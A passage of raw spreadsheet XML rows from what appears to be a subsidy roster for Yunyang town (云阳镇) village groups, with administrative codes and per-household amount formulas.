      <c r="A1542" s="13" t="s">
        <v>4130</v>
      </c>
      <c r="B1542" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1542" s="14" t="s">
        <v>4131</v>
      </c>
      <c r="D1542" s="14" t="s">
        <v>4132</v>
      </c>
      <c r="E1542" s="14" t="s">
        <v>3760</v>
      </c>
      <c r="F1542" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1542" s="14">
        <v>1</v>
      </c>
      <c r="H1542" s="14">
        <v>340</v>
      </c>
      <c r="I1542" s="14">
        <f t="shared" ref="I1542:I1547" si="79">H1542*G1542</f>
        <v>340</v>
      </c>
      <c r="J1542" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1542" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1543" ht="23" customHeight="1" spans="1:11">
      <c r="A1543" s="13" t="s">
        <v>4133</v>
      </c>
      <c r="B1543" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1543" s="14" t="s">
        <v>4134</v>
      </c>
      <c r="D1543" s="14" t="s">
        <v>4135</v>
      </c>
      <c r="E1543" s="14" t="s">
        <v>4136</v>
      </c>
      <c r="F1543" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1543" s="14">
        <v>1</v>
      </c>
      <c r="H1543" s="14">
        <v>340</v>
      </c>
      <c r="I1543" s="14">
        <f t="shared" si="79"/>
        <v>340</v>
      </c>
      <c r="J1543" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1543" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1544" ht="23" customHeight="1" spans="1:11">
      <c r="A1544" s="13" t="s">
        <v>4137</v>
      </c>
      <c r="B1544" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1544" s="14" t="s">
        <v>4138</v>
      </c>
      <c r="D1544" s="14" t="s">
        <v>4139</v>
      </c>
      <c r="E1544" s="14" t="s">
        <v>3093</v>
      </c>
      <c r="F1544" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1544" s="14">
        <v>1</v>
      </c>
      <c r="H1544" s="14">
        <v>340</v>
      </c>
      <c r="I1544" s="14">
        <f t="shared" si="79"/>
        <v>340</v>
      </c>
      <c r="J1544" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1544" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1545" ht="23" customHeight="1" spans="1:11">
      <c r="A1545" s="13" t="s">
        <v>4140</v>
      </c>
      <c r="B1545" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1545" s="14" t="s">
        <v>4138</v>
      </c>
      <c r="D1545" s="14" t="s">
        <v>4141</v>
      </c>
      <c r="E1545" s="14" t="s">
        <v>1336</v>
      </c>
      <c r="F1545" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1545" s="14">
        <v>1</v>
      </c>
      <c r="H1545" s="14">
        <v>340</v>
      </c>
      <c r="I1545" s="14">
        <f t="shared" si="79"/>
        <v>340</v>
      </c>
      <c r="J1545" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1545" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1546" ht="23" customHeight="1" spans="1:11">
      <c r="A1546" s="13" t="s">
        <v>4142</v>
      </c>
      <c r="B1546" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1546" s="14" t="s">
        <v>4143</v>
      </c>
      <c r="D1546" s="14" t="s">
        <v>4144</v>
      </c>
      <c r="E1546" s="14" t="s">
        <v>3956</v>
      </c>
      <c r="F1546" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1546" s="14">
        <v>1</v>
      </c>
      <c r="H1546" s="14">
        <v>340</v>
      </c>
      <c r="I1546" s="14">
        <f t="shared" si="79"/>
        <v>340</v>
      </c>
      <c r="J1546" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1546" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1547" ht="23" customHeight="1" spans="1:11">
      <c r="A1547" s="13" t="s">
        <v>4145</v>
      </c>
      <c r="B1547" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1547" s="14" t="s">
        <v>4131</v>
      </c>
      <c r="D1547" s="14" t="s">
        <v>4146</v>
      </c>
      <c r="E1547" s="14" t="s">
        <v>4039</v>
      </c>
      <c r="F1547" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1547" s="14">
        <v>3</v>
      </c>
      <c r="H1547" s="14">
        <v>330</v>
      </c>
      <c r="I1547" s="14">
        <f t="shared" si="79"/>
        <v>990</v>
      </c>
      <c r="J1547" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1547" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1548" ht="23" customHeight="1" spans="1:11">
      <c r="A1548" s="13" t="s">
        <v>4147</v>
      </c>
      <c r="B1548" s="14" t="str">
        <f>B1547</f>
        <v>云阳镇</v>
      </c>
      <c r="C1548" s="14" t="str">
        <f>C1547</f>
        <v>云阳小关</v>
      </c>
      <c r="D1548" s="13" t="s">
        <v>4148</v>
      </c>
      <c r="E1548" s="13" t="s">
        <v>4149</v>
      </c>
      <c r="F1548" s="14" t="str">
        <f>F1547</f>
        <v>4113210521</v>
      </c>
      <c r="G1548" s="14"/>
      <c r="H1548" s="14"/>
      <c r="I1548" s="14"/>
      <c r="J1548" s="14"/>
      <c r="K1548" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1549" ht="23" customHeight="1" spans="1:11">
      <c r="A1549" s="13" t="s">
        <v>4150</v>
      </c>
      <c r="B1549" s="14" t="str">
        <f>B1548</f>
        <v>云阳镇</v>
      </c>
      <c r="C1549" s="14" t="str">
        <f>C1548</f>
        <v>云阳小关</v>
      </c>
      <c r="D1549" s="40" t="s">
        <v>4151</v>
      </c>
      <c r="E1549" s="40" t="s">
        <v>4152</v>
      </c>
      <c r="F1549" s="14" t="str">
        <f>F1548</f>
        <v>4113210521</v>
      </c>
      <c r="G1549" s="14"/>
      <c r="H1549" s="14"/>
      <c r="I1549" s="14"/>
      <c r="J1549" s="14"/>
      <c r="K1549" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1550" ht="23" customHeight="1" spans="1:11">
      <c r="A1550" s="13" t="s">
        <v>4153</v>
      </c>
      <c r="B1550" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1550" s="14" t="s">
        <v>4154</v>
      </c>
      <c r="D1550" s="14" t="s">
        <v>4155</v>
      </c>
      <c r="E1550" s="14" t="s">
        <v>3716</v>
      </c>
      <c r="F1550" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1550" s="14">
        <v>1</v>
      </c>
      <c r="H1550" s="14">
        <v>340</v>
      </c>
      <c r="I1550" s="14">
        <f>H1550*G1550</f>
        <v>340</v>
      </c>
      <c r="J1550" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1550" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1551" ht="23" customHeight="1" spans="1:11">
      <c r="A1551" s="13" t="s">
        <v>4156</v>
      </c>
      <c r="B1551" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1551" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1551" s="14" t="s">
        <v>4157</v>
      </c>
      <c r="E1551" s="14" t="s">
        <v>3869</v>
      </c>
      <c r="F1551" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1551" s="14">
        <v>1</v>
      </c>
      <c r="H1551" s="14">
        <v>340</v>
      </c>
      <c r="I1551" s="14">
        <f>H1551*G1551</f>
        <v>340</v>
      </c>
      <c r="J1551" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1551" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1552" ht="23" customHeight="1" spans="1:11">
      <c r="A1552" s="13" t="s">
        <v>4158</v>
      </c>
      <c r="B1552" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1552" s="14" t="s">
        <v>3857</v>
      </c>
      <c r="D1552" s="14" t="s">
        <v>4159</v>
      </c>
      <c r="E1552" s="14" t="s">
        <v>4160</v>
      </c>
      <c r="F1552" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1552" s="14">
        <v>2</v>
      </c>
      <c r="H1552" s="14">
        <v>310</v>
      </c>
      <c r="I1552" s="14">
        <f>H1552*G1552</f>
        <v>620</v>
      </c>
      <c r="J1552" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1552" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1553" ht="23" customHeight="1" spans="1:11">
      <c r="A1553" s="13" t="s">
        <v>4161</v>
      </c>
      <c r="B1553" s="14" t="str">
        <f>B1552</f>
        <v>云阳镇</v>
      </c>
      <c r="C1553" s="14" t="str">
        <f>C1552</f>
        <v>老城二组</v>
      </c>
      <c r="D1553" s="19" t="s">
        <v>4162</v>
      </c>
      <c r="E1553" s="19" t="s">
        <v>1666</v>
      </c>
      <c r="F1553" s="14" t="str">
        <f>F1552</f>
        <v>4113210523</v>
      </c>
      <c r="G1553" s="14"/>
      <c r="H1553" s="14"/>
      <c r="I1553" s="14"/>
      <c r="J1553" s="14"/>
      <c r="K1553" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1554" ht="23" customHeight="1" spans="1:11">
      <c r="A1554" s="13" t="s">
        <v>4163</v>
      </c>
      <c r="B1554" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1554" s="14" t="s">
        <v>3938</v>
      </c>
      <c r="D1554" s="14" t="s">
        <v>4164</v>
      </c>
      <c r="E1554" s="14" t="s">
        <v>3956</v>
      </c>
      <c r="F1554" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1554" s="14">
        <v>1</v>
      </c>
      <c r="H1554" s="14">
        <v>340</v>
      </c>
      <c r="I1554" s="14">
        <f>H1554*G1554</f>
        <v>340</v>
      </c>
      <c r="J1554" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1554" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1555" ht="23" customHeight="1" spans="1:11">
      <c r="A1555" s="13" t="s">
        <v>4165</v>
      </c>
      <c r="B1555" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1555" s="14" t="s">
        <v>3954</v>
      </c>
      <c r="D1555" s="14" t="s">
        <v>4166</v>
      </c>
      <c r="E1555" s="14" t="s">
        <v>4167</v>
      </c>
      <c r="F1555" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1555" s="14">
        <v>1</v>
      </c>
      <c r="H1555" s="14">
        <v>340</v>
      </c>
      <c r="I1555" s="14">
        <f>H1555*G1555</f>
        <v>340</v>
      </c>
      <c r="J1555" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1555" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1556" ht="23" customHeight="1" spans="1:11">
      <c r="A1556" s="13" t="s">
        <v>4168</v>
      </c>
      <c r="B1556" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1556" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="D1556" s="14" t="s">
        <v>4169</v>
      </c>
      <c r="E1556" s="14" t="s">
        <v>3805</v>
      </c>
      <c r="F1556" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1556" s="14">
        <v>1</v>
      </c>
      <c r="H1556" s="14">
        <v>340</v>
      </c>
      <c r="I1556" s="14">
        <f>H1556*G1556</f>
        <v>340</v>
      </c>
      <c r="J1556" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1556" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1557" ht="23" customHeight="1" spans="1:11">
      <c r="A1557" s="13" t="s">
        <v>4170</v>
      </c>
      <c r="B1557" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1557" s="14" t="s">
        <v>3954</v>
      </c>
      <c r="D1557" s="14" t="s">
        <v>4171</v>
      </c>
      <c r="E1557" s="14" t="s">
        <v>3713</v>
      </c>
      <c r="F1557" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1557" s="14">
        <v>1</v>
      </c>
      <c r="H1557" s="14">
        <v>340</v>
      </c>
      <c r="I1557" s="14">
        <f>H1557*G1557</f>
        <v>340</v>
      </c>
      <c r="J1557" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1557" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1558" ht="23" customHeight="1" spans="1:11">
      <c r="A1558" s="13" t="s">
        <v>4172</v>
      </c>
      <c r="B1558" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1558" s="14" t="s">
        <v>3670</v>
      </c>
      <c r="D1558" s="14" t="s">
        <v>4173</v>
      </c>
      <c r="E1558" s="14" t="s">
        <v>4174</v>
      </c>
      <c r="F1558" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1558" s="14">
        <v>2</v>
      </c>
      <c r="H1558" s="14">
        <v>300</v>
      </c>
      <c r="I1558" s="14">
        <f>H1558*G1558</f>
        <v>600</v>
      </c>
      <c r="J1558" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1558" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1559" ht="23" customHeight="1" spans="1:11">
      <c r="A1559" s="13" t="s">
        <v>4175</v>
      </c>
      <c r="B1559" s="14" t="str">
        <f>B1558</f>
        <v>云阳镇</v>
      </c>
      <c r="C1559" s="14" t="str">
        <f>C1558</f>
        <v>小关九组</v>
      </c>
      <c r="D1559" s="19" t="s">
        <v>4176</v>
      </c>
      <c r="E1559" s="19" t="s">
        <v>4177</v>
      </c>
      <c r="F1559" s="14" t="str">
        <f>F1558</f>
        <v>4113210521</v>
      </c>
      <c r="G1559" s="14"/>
      <c r="H1559" s="14"/>
      <c r="I1559" s="14"/>
      <c r="J1559" s="14"/>
      <c r="K1559" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1560" ht="23" customHeight="1" spans="1:11">
      <c r="A1560" s="13" t="s">
        <v>4178</v>
      </c>
      <c r="B1560" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1560" s="14" t="s">
        <v>3938</v>
      </c>
      <c r="D1560" s="14" t="s">
        <v>4179</v>
      </c>
      <c r="E1560" s="14" t="s">
        <v>4180</v>
      </c>
      <c r="F1560" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1560" s="14">
        <v>1</v>
      </c>
      <c r="H1560" s="14">
        <v>340</v>
      </c>
      <c r="I1560" s="14">
        <f t="shared" ref="I1560:I1567" si="80">H1560*G1560</f>
        <v>340</v>
      </c>
      <c r="J1560" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1560" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1561" ht="23" customHeight="1" spans="1:11">
      <c r="A1561" s="13" t="s">
        <v>4181</v>
      </c>
      <c r="B1561" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1561" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1561" s="14" t="s">
        <v>4182</v>
      </c>
      <c r="E1561" s="14" t="s">
        <v>4183</v>
      </c>
      <c r="F1561" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1561" s="14">
        <v>1</v>
      </c>
      <c r="H1561" s="14">
        <v>340</v>
      </c>
      <c r="I1561" s="14">
        <f t="shared" si="80"/>
        <v>340</v>
      </c>
      <c r="J1561" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1561" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1562" ht="23" customHeight="1" spans="1:11">
      <c r="A1562" s="13" t="s">
        <v>4184</v>
      </c>
      <c r="B1562" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1562" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1562" s="14" t="s">
        <v>4185</v>
      </c>
      <c r="E1562" s="14" t="s">
        <v>3975</v>
      </c>
      <c r="F1562" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1562" s="14">
        <v>1</v>
      </c>
      <c r="H1562" s="14">
        <v>340</v>
      </c>
      <c r="I1562" s="14">
        <f t="shared" si="80"/>
        <v>340</v>
      </c>
      <c r="J1562" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1562" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1563" ht="23" customHeight="1" spans="1:11">
      <c r="A1563" s="13" t="s">
        <v>4186</v>
      </c>
      <c r="B1563" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1563" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1563" s="14" t="s">
        <v>4187</v>
      </c>
      <c r="E1563" s="14" t="s">
        <v>4188</v>
      </c>
      <c r="F1563" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1563" s="14">
        <v>1</v>
      </c>
      <c r="H1563" s="14">
        <v>340</v>
      </c>
      <c r="I1563" s="14">
        <f t="shared" si="80"/>
        <v>340</v>
      </c>
      <c r="J1563" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1563" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1564" ht="23" customHeight="1" spans="1:11">
      <c r="A1564" s="13" t="s">
        <v>4189</v>
      </c>
      <c r="B1564" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1564" s="14" t="s">
        <v>3721</v>
      </c>
      <c r="D1564" s="14" t="s">
        <v>4190</v>
      </c>
      <c r="E1564" s="14" t="s">
        <v>4111</v>
      </c>
      <c r="F1564" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1564" s="14">
        <v>1</v>
      </c>
      <c r="H1564" s="14">
        <v>340</v>
      </c>
      <c r="I1564" s="14">
        <f t="shared" si="80"/>
        <v>340</v>
      </c>
      <c r="J1564" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1564" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1565" ht="23" customHeight="1" spans="1:11">
      <c r="A1565" s="13" t="s">
        <v>4191</v>
      </c>
      <c r="B1565" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1565" s="14" t="s">
        <v>3721</v>
      </c>
      <c r="D1565" s="14" t="s">
        <v>4192</v>
      </c>
      <c r="E1565" s="14" t="s">
        <v>3863</v>
      </c>
      <c r="F1565" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1565" s="14">
        <v>1</v>
      </c>
      <c r="H1565" s="14">
        <v>340</v>
      </c>
      <c r="I1565" s="14">
        <f t="shared" si="80"/>
        <v>340</v>
      </c>
      <c r="J1565" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1565" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1566" ht="23" customHeight="1" spans="1:11">
      <c r="A1566" s="13" t="s">
        <v>4193</v>
      </c>
      <c r="B1566" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1566" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1566" s="14" t="s">
        <v>4194</v>
      </c>
      <c r="E1566" s="14" t="s">
        <v>4077</v>
      </c>
      <c r="F1566" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1566" s="14">
        <v>1</v>
      </c>
      <c r="H1566" s="14">
        <v>340</v>
      </c>
      <c r="I1566" s="14">
        <f t="shared" si="80"/>
        <v>340</v>
      </c>
      <c r="J1566" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1566" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1567" ht="23" customHeight="1" spans="1:11">
      <c r="A1567" s="13" t="s">
        <v>4195</v>
      </c>
      <c r="B1567" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1567" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1567" s="14" t="s">
        <v>4196</v>
      </c>
      <c r="E1567" s="14" t="s">
        <v>3829</v>
      </c>
      <c r="F1567" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1567" s="14">
        <v>2</v>
      </c>
      <c r="H1567" s="14">
        <v>300</v>
      </c>
      <c r="I1567" s="14">
        <f t="shared" si="80"/>
        <v>600</v>
      </c>
      <c r="J1567" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1567" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1568" ht="23" customHeight="1" spans="1:11">
      <c r="A1568" s="13" t="s">
        <v>4197</v>
      </c>
      <c r="B1568" s="14" t="str">
        <f>B1567</f>
        <v>云阳镇</v>
      </c>
      <c r="C1568" s="14" t="str">
        <f>C1567</f>
        <v>老城四组</v>
      </c>
      <c r="D1568" s="13" t="s">
        <v>4198</v>
      </c>
      <c r="E1568" s="13" t="s">
        <v>3841</v>
      </c>
      <c r="F1568" s="14" t="str">
        <f>F1567</f>
        <v>4113210523</v>
      </c>
      <c r="G1568" s="14"/>
      <c r="H1568" s="14"/>
      <c r="I1568" s="14"/>
      <c r="J1568" s="14"/>
      <c r="K1568" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1569" ht="23" customHeight="1" spans="1:11">
      <c r="A1569" s="13" t="s">
        <v>4199</v>
      </c>
      <c r="B1569" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1569" s="14" t="s">
        <v>3857</v>
      </c>
      <c r="D1569" s="14" t="s">
        <v>4200</v>
      </c>
      <c r="E1569" s="14" t="s">
        <v>4188</v>
      </c>
      <c r="F1569" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1569" s="14">
        <v>2</v>
      </c>
      <c r="H1569" s="14">
        <v>300</v>
      </c>
      <c r="I1569" s="14">
        <f>H1569*G1569</f>
        <v>600</v>
      </c>
      <c r="J1569" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1569" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1570" ht="23" customHeight="1" spans="1:11">
      <c r="A1570" s="13" t="s">
        <v>4201</v>
      </c>
      <c r="B1570" s="14" t="str">
        <f>B1569</f>
        <v>云阳镇</v>
      </c>
      <c r="C1570" s="14" t="str">
        <f>C1569</f>
        <v>老城二组</v>
      </c>
      <c r="D1570" s="13" t="s">
        <v>4202</v>
      </c>
      <c r="E1570" s="13" t="s">
        <v>4203</v>
      </c>
      <c r="F1570" s="14" t="str">
        <f>F1569</f>
        <v>4113210523</v>
      </c>
      <c r="G1570" s="14"/>
      <c r="H1570" s="14"/>
      <c r="I1570" s="14"/>
      <c r="J1570" s="14"/>
      <c r="K1570" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1571" ht="23" customHeight="1" spans="1:11">
      <c r="A1571" s="13" t="s">
        <v>4204</v>
      </c>
      <c r="B1571" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1571" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1571" s="14" t="s">
        <v>4205</v>
      </c>
      <c r="E1571" s="14" t="s">
        <v>4206</v>
      </c>
      <c r="F1571" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1571" s="14">
        <v>1</v>
      </c>
      <c r="H1571" s="14">
        <v>340</v>
      </c>
      <c r="I1571" s="14">
        <f>H1571*G1571</f>
        <v>340</v>
      </c>
      <c r="J1571" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1571" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1572" ht="23" customHeight="1" spans="1:11">
      <c r="A1572" s="13" t="s">
        <v>4207</v>
      </c>
      <c r="B1572" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1572" s="14" t="s">
        <v>3771</v>
      </c>
      <c r="D1572" s="14" t="s">
        <v>4208</v>
      </c>
      <c r="E1572" s="14" t="s">
        <v>3692</v>
      </c>
      <c r="F1572" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1572" s="14">
        <v>1</v>
      </c>
      <c r="H1572" s="14">
        <v>340</v>
      </c>
      <c r="I1572" s="14">
        <f>H1572*G1572</f>
        <v>340</v>
      </c>
      <c r="J1572" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1572" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1573" ht="23" customHeight="1" spans="1:11">
      <c r="A1573" s="13" t="s">
        <v>4209</v>
      </c>
      <c r="B1573" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1573" s="14" t="s">
        <v>3771</v>
      </c>
      <c r="D1573" s="14" t="s">
        <v>4210</v>
      </c>
      <c r="E1573" s="14" t="s">
        <v>3749</v>
      </c>
      <c r="F1573" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1573" s="14">
        <v>1</v>
      </c>
      <c r="H1573" s="14">
        <v>340</v>
      </c>
      <c r="I1573" s="14">
        <f>H1573*G1573</f>
        <v>340</v>
      </c>
      <c r="J1573" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1573" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1574" ht="23" customHeight="1" spans="1:11">
      <c r="A1574" s="13" t="s">
        <v>4211</v>
      </c>
      <c r="B1574" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1574" s="14" t="s">
        <v>3725</v>
      </c>
      <c r="D1574" s="14" t="s">
        <v>4212</v>
      </c>
      <c r="E1574" s="14" t="s">
        <v>3829</v>
      </c>
      <c r="F1574" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1574" s="14">
        <v>1</v>
      </c>
      <c r="H1574" s="14">
        <v>340</v>
      </c>
      <c r="I1574" s="14">
        <f>H1574*G1574</f>
        <v>340</v>
      </c>
      <c r="J1574" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1574" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1575" ht="23" customHeight="1" spans="1:11">
      <c r="A1575" s="13" t="s">
        <v>4213</v>
      </c>
      <c r="B1575" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1575" s="14" t="s">
        <v>3670</v>
      </c>
      <c r="D1575" s="14" t="s">
        <v>4214</v>
      </c>
      <c r="E1575" s="14" t="s">
        <v>4215</v>
      </c>
      <c r="F1575" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1575" s="14">
        <v>2</v>
      </c>
      <c r="H1575" s="14">
        <v>300</v>
      </c>
      <c r="I1575" s="14">
        <f>H1575*G1575</f>
        <v>600</v>
      </c>
      <c r="J1575" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1575" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1576" ht="23" customHeight="1" spans="1:11">
      <c r="A1576" s="13" t="s">
        <v>4216</v>
      </c>
      <c r="B1576" s="14" t="str">
        <f>B1575</f>
        <v>云阳镇</v>
      </c>
      <c r="C1576" s="14" t="str">
        <f>C1575</f>
        <v>小关九组</v>
      </c>
      <c r="D1576" s="13" t="s">
        <v>4217</v>
      </c>
      <c r="E1576" s="13" t="s">
        <v>4218</v>
      </c>
      <c r="F1576" s="14" t="str">
        <f>F1575</f>
        <v>4113210521</v>
      </c>
      <c r="G1576" s="14"/>
      <c r="H1576" s="14"/>
      <c r="I1576" s="14"/>
      <c r="J1576" s="14"/>
      <c r="K1576" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1577" ht="23" customHeight="1" spans="1:11">
      <c r="A1577" s="13" t="s">
        <v>4219</v>
      </c>
      <c r="B1577" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1577" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1577" s="14" t="s">
        <v>4220</v>
      </c>
      <c r="E1577" s="14" t="s">
        <v>4136</v>
      </c>
      <c r="F1577" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1577" s="14">
        <v>1</v>
      </c>
      <c r="H1577" s="14">
        <v>340</v>
      </c>
      <c r="I1577" s="14">
        <f t="shared" ref="I1577:I1582" si="81">H1577*G1577</f>
        <v>340</v>
      </c>
      <c r="J1577" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1577" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1578" ht="23" customHeight="1" spans="1:11">
      <c r="A1578" s="13" t="s">
        <v>4221</v>
      </c>
      <c r="B1578" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1578" s="14" t="s">
        <v>3857</v>
      </c>
      <c r="D1578" s="14" t="s">
        <v>4222</v>
      </c>
      <c r="E1578" s="14" t="s">
        <v>3888</v>
      </c>
      <c r="F1578" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1578" s="14">
        <v>1</v>
      </c>
      <c r="H1578" s="14">
        <v>340</v>
      </c>
      <c r="I1578" s="14">
        <f t="shared" si="81"/>
        <v>340</v>
      </c>
      <c r="J1578" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1578" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1579" ht="23" customHeight="1" spans="1:11">
      <c r="A1579" s="13" t="s">
        <v>4223</v>
      </c>
      <c r="B1579" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1579" s="14" t="s">
        <v>3725</v>
      </c>
      <c r="D1579" s="14" t="s">
        <v>4224</v>
      </c>
      <c r="E1579" s="14" t="s">
        <v>3683</v>
      </c>
      <c r="F1579" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1579" s="14">
        <v>1</v>
      </c>
      <c r="H1579" s="14">
        <v>340</v>
      </c>
      <c r="I1579" s="14">
        <f t="shared" si="81"/>
        <v>340</v>
      </c>
      <c r="J1579" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1579" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1580" ht="23" customHeight="1" spans="1:11">
      <c r="A1580" s="13" t="s">
        <v>4225</v>
      </c>
      <c r="B1580" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1580" s="14" t="s">
        <v>3725</v>
      </c>
      <c r="D1580" s="14" t="s">
        <v>4226</v>
      </c>
      <c r="E1580" s="14" t="s">
